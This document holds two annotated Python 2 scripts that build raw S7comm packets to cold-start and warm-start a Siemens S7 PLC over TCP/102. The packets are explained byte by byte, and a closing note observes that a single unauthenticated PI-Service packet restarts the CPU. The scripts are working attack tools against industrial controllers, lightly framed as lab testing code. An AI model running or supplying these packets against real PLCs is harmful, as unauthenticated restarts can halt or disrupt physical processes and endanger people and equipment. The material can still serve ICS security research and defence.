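#!/usr/bin/python2
# -*- coding: utf-8 -*-
"""Cold start of the user program on a Siemens S7 PLC over S7comm (TCP/102).

Three hand-built packets are sent on one TCP connection:

1. a COTP (ISO 8073 / RFC 1006) connection request,
2. an S7comm "Setup communication" job that negotiates the PDU size,
3. an S7comm PI-Service job (function 0x28) naming the PI ``P_PROGRAM`` with
   the two-byte argument block ``C `` -- the only thing that differs from the
   warm-start script is that argument block.

Security note: nothing in this sequence carries a credential.  Whoever can
reach TCP/102 on the PLC can restart the CPU with these 86 bytes, so run it
only against lab hardware you are authorised to test.

The shebang and coding declaration are kept on lines 1-2 on purpose: Python 2
only honours the encoding declaration there, and the original file had a
non-ASCII comment above it.
"""
import binascii
import socket
import struct
import time

PLC_ADDR = "192.168.43.106"  # target PLC
PLC_PORT = 102               # ISO-on-TCP (RFC 1006) listens on 102

# Pause before each packet.  The original author observed that the handshake
# packets and the pauses are not strictly required but make the exchange more
# reliable, so they are kept (and tunable).
STEP_DELAY = 0.5
# Upper bound on connect() and on each recv(); the original script had none
# and would hang forever on a silent host.
SOCKET_TIMEOUT = 5.0

# COTP connection request (TPKT header + ISO 8073 CR TPDU):
#   03 00 00 16      TPKT: version 3, reserved 0, length 22
#   11 e0            COTP: length 17, PDU type 0xe0 (CR, connect request)
#   00 00 00 01 00   dst reference 0x0000, src reference 0x0001, class 0
#                    (no explicit flow control)
#   c0 01 0a         parameter 0xc0 (TPDU size), length 1, value 0x0a
#                    -- not described in the original notes; presumably 2^10
#   c1 02 01 00      parameter 0xc1 (src-tsap), length 2, value 0x0100
#   c2 02 01 02      parameter 0xc2 (dst-tsap), length 2, value 0x0102
create_connect_payload = (
    b'\x03\x00\x00\x16'
    b'\x11\xe0\x00\x00\x00\x01\x00'
    b'\xc0\x01\x0a'
    b'\xc1\x02\x01\x00'
    b'\xc2\x02\x01\x02'
)

# S7comm "Setup communication" job (TPKT + COTP DT + S7 header + parameter):
#   03 00 00 19            TPKT: version 3, reserved 0, length 25
#   02 f0 80               COTP: length 2, PDU type 0xf0 (DT data),
#                          0x80 = 1000 0000: TPDU number 0, last data unit
#   32 01 00 00 00 00      S7: protocol id 0x32, ROSCTR 1 (job),
#                          redundancy id 0x0000, PDU reference 0x0000
#   00 08 00 00            parameter length 8, data length 0
#   f0 00 00 01 00 01      function 0xf0 (setup communication), reserved 0,
#                          max AmQ calling 1, max AmQ called 1
#   01 e0                  PDU length 480 (0x01e0)
setup_communication_payload = (
    b'\x03\x00\x00\x19'
    b'\x02\xf0\x80'
    b'\x32\x01\x00\x00\x00\x00\x00\x08\x00\x00'
    b'\xf0\x00\x00\x01\x00\x01\x01\xe0'
)

# S7comm PI-Service job that cold-starts the user program:
#   03 00 00 27            TPKT: version 3, reserved 0, length 39
#   02 f0 80               COTP DT, last data unit
#   32 01 00 00 9f 00      S7: job, redundancy id 0, PDU reference bytes 00 9f
#   00 16 00 00            parameter length 22, data length 0
#   28                     function 0x28 (PI-Service)
#   00 00 00 00 00 00 fd   seven bytes whose meaning is not documented here
#   00 02 43 20            parameter block: length 2, contents "C " (0x43 0x20)
#                          -- this is the cold-start argument; the warm-start
#                          request sends a zero-length block instead
#   09 "P_PROGRAM"         PI name: length 9, then the name
# The original listing ended in "\4d" (an octal escape for byte 4 followed by
# a literal "d"), which made the packet 40 bytes and the last byte wrong; the
# final byte of "P_PROGRAM" is 0x4d.
cpu_start_payload = (
    b'\x03\x00\x00\x27'
    b'\x02\xf0\x80'
    b'\x32\x01\x00\x00\x9f\x00\x00\x16\x00\x00'
    b'\x28'
    b'\x00\x00\x00\x00\x00\x00\xfd'
    b'\x00\x02\x43\x20'
    b'\x09' b'P_PROGRAM'
)


def tpkt_length(payload):
    """Return the TPKT length field (bytes 2-3, big-endian) of ``payload``.

    Raises ValueError when the packet is shorter than a TPKT header or when the
    declared length disagrees with the actual size -- the symptom of a mistyped
    escape sequence in a hand-written payload.
    """
    if len(payload) < 4:
        raise ValueError("TPKT packet too short: %r" % (payload,))
    declared = struct.unpack(">H", payload[2:4])[0]
    if declared != len(payload):
        raise ValueError(
            "TPKT length field says %d bytes but payload is %d bytes"
            % (declared, len(payload))
        )
    return declared


def exchange(sock, payload, delay=STEP_DELAY):
    """Pause, send one TPKT packet on ``sock`` and return the raw reply.

    Raises ValueError for a malformed payload (see ``tpkt_length``),
    socket.timeout when no reply arrives within the socket's timeout, and
    RuntimeError when the peer closes the connection instead of answering.
    The reply is returned unparsed; it is up to the caller to inspect it.
    """
    tpkt_length(payload)
    time.sleep(delay)
    sock.sendall(payload)  # send() may write only part of the packet
    reply = sock.recv(1024)
    if not reply:
        raise RuntimeError("PLC closed the connection after %r" % (payload[:8],))
    return reply


def cold_start(addr=PLC_ADDR, port=PLC_PORT, timeout=SOCKET_TIMEOUT):
    """Run the COTP / setup / PI-Service sequence and return the three replies.

    The socket is always closed, even when a step fails.
    """
    sock = socket.create_connection((addr, port), timeout)
    try:
        return [
            exchange(sock, packet)
            for packet in (
                create_connect_payload,
                setup_communication_payload,
                cpu_start_payload,
            )
        ]
    finally:
        sock.close()


if __name__ == "__main__":
    # Print each reply as hex so a failed step (e.g. an S7 error class/code in
    # the PI-Service acknowledgement) is visible instead of silently discarded.
    for reply in cold_start():
        print(binascii.hexlify(reply).decode("ascii"))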
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
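# Warm start of the user program on a Siemens S7 PLC over S7comm (TCP/102).
#
# (Originally a stand-alone script: #!/usr/bin/python2, coding utf-8.)
#
# Same three-packet sequence as the cold-start script -- COTP connection
# request, S7comm "Setup communication", then a PI-Service job for
# ``P_PROGRAM`` -- except that the PI-Service parameter block is empty
# (length 0) instead of carrying the cold-start argument "C ".
#
# Security note: nothing in this sequence carries a credential.  Whoever can
# reach TCP/102 on the PLC can restart the CPU with these 84 bytes, so run it
# only against lab hardware you are authorised to test.
import binascii
import socket
import struct
import time

PLC_ADDR = "192.168.43.106"  # target PLC
PLC_PORT = 102               # ISO-on-TCP (RFC 1006) listens on 102

# Pause before each packet; kept because the original author found the
# handshake and pauses made the exchange more reliable.
STEP_DELAY = 0.5
# Upper bound on connect() and on each recv(); the original script had none
# and would hang forever on a silent host.
SOCKET_TIMEOUT = 5.0

# COTP connection request (TPKT header + ISO 8073 CR TPDU):
#   03 00 00 16      TPKT: version 3, reserved 0, length 22
#   11 e0            COTP: length 17, PDU type 0xe0 (CR, connect request)
#   00 00 00 01 00   dst reference 0x0000, src reference 0x0001, class 0
#                    (no explicit flow control)
#   c0 01 0a         parameter 0xc0 (TPDU size), length 1, value 0x0a
#                    -- not described in the original notes; presumably 2^10
#   c1 02 01 00      parameter 0xc1 (src-tsap), length 2, value 0x0100
#   c2 02 01 02      parameter 0xc2 (dst-tsap), length 2, value 0x0102
create_connect_payload = (
    b'\x03\x00\x00\x16'
    b'\x11\xe0\x00\x00\x00\x01\x00'
    b'\xc0\x01\x0a'
    b'\xc1\x02\x01\x00'
    b'\xc2\x02\x01\x02'
)

# S7comm "Setup communication" job (TPKT + COTP DT + S7 header + parameter):
#   03 00 00 19            TPKT: version 3, reserved 0, length 25
#   02 f0 80               COTP: length 2, PDU type 0xf0 (DT data),
#                          0x80 = 1000 0000: TPDU number 0, last data unit
#   32 01 00 00 00 00      S7: protocol id 0x32, ROSCTR 1 (job),
#                          redundancy id 0x0000, PDU reference 0x0000
#   00 08 00 00            parameter length 8, data length 0
#   f0 00 00 01 00 01      function 0xf0 (setup communication), reserved 0,
#                          max AmQ calling 1, max AmQ called 1
#   01 e0                  PDU length 480 (0x01e0)
# The original listing had a stray trailing quote after this literal, which is
# a SyntaxError (unterminated string); it is removed here.
setup_communication_payload = (
    b'\x03\x00\x00\x19'
    b'\x02\xf0\x80'
    b'\x32\x01\x00\x00\x00\x00\x00\x08\x00\x00'
    b'\xf0\x00\x00\x01\x00\x01\x01\xe0'
)

# S7comm PI-Service job that warm-starts the user program:
#   03 00 00 25            TPKT: version 3, reserved 0, length 37
#   02 f0 80               COTP DT, last data unit
#   32 01 00 00 63 00      S7: job, redundancy id 0, PDU reference bytes 00 63
#   00 14 00 00            parameter length 20, data length 0
#   28                     function 0x28 (PI-Service)
#   00 00 00 00 00 00 fd   seven bytes whose meaning is not documented here
#   00 00                  parameter block: length 0 (no "C " argument, which
#                          is what makes this a warm start rather than cold)
#   09 "P_PROGRAM"         PI name: length 9, then the name
cpu_start_payload = (
    b'\x03\x00\x00\x25'
    b'\x02\xf0\x80'
    b'\x32\x01\x00\x00\x63\x00\x00\x14\x00\x00'
    b'\x28'
    b'\x00\x00\x00\x00\x00\x00\xfd'
    b'\x00\x00'
    b'\x09' b'P_PROGRAM'
)


def tpkt_length(payload):
    """Return the TPKT length field (bytes 2-3, big-endian) of ``payload``.

    Raises ValueError when the packet is shorter than a TPKT header or when the
    declared length disagrees with the actual size -- the symptom of a mistyped
    escape sequence in a hand-written payload.
    """
    if len(payload) < 4:
        raise ValueError("TPKT packet too short: %r" % (payload,))
    declared = struct.unpack(">H", payload[2:4])[0]
    if declared != len(payload):
        raise ValueError(
            "TPKT length field says %d bytes but payload is %d bytes"
            % (declared, len(payload))
        )
    return declared


def exchange(sock, payload, delay=STEP_DELAY):
    """Pause, send one TPKT packet on ``sock`` and return the raw reply.

    Raises ValueError for a malformed payload (see ``tpkt_length``),
    socket.timeout when no reply arrives within the socket's timeout, and
    RuntimeError when the peer closes the connection instead of answering.
    The reply is returned unparsed; it is up to the caller to inspect it.
    """
    tpkt_length(payload)
    time.sleep(delay)
    sock.sendall(payload)  # send() may write only part of the packet
    reply = sock.recv(1024)
    if not reply:
        raise RuntimeError("PLC closed the connection after %r" % (payload[:8],))
    return reply


def warm_start(addr=PLC_ADDR, port=PLC_PORT, timeout=SOCKET_TIMEOUT):
    """Run the COTP / setup / PI-Service sequence and return the three replies.

    The socket is always closed, even when a step fails.
    """
    sock = socket.create_connection((addr, port), timeout)
    try:
        return [
            exchange(sock, packet)
            for packet in (
                create_connect_payload,
                setup_communication_payload,
                cpu_start_payload,
            )
        ]
    finally:
        sock.close()


if __name__ == "__main__":
    # Print each reply as hex so a failed step (e.g. an S7 error class/code in
    # the PI-Service acknowledgement) is visible instead of silently discarded.
    for reply in warm_start():
        print(binascii.hexlify(reply).decode("ascii"))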
# Observed in testing: the PLC carries out the PI-Service job even when the
# COTP connection request (create_connect_payload) and the Setup-communication
# job (setup_communication_payload) are omitted and only the job packet is
# sent.  From a security standpoint that means a single unauthenticated packet
# on TCP/102 is enough to restart the CPU.
# The setup step is still worth sending: it negotiates the PDU size with the
# peer (the original note speaks of 960 bytes; the payload above actually asks
# for a PDU length of 480 = 0x01e0), and leaving it out may cause problems in
# more complex exchanges.  Likewise, Snap (presumably Snap7) sends the COTP
# connection request before every Setup-communication step so the underlying
# connection is established and the session stays stable; the details are
# outside the scope of these notes.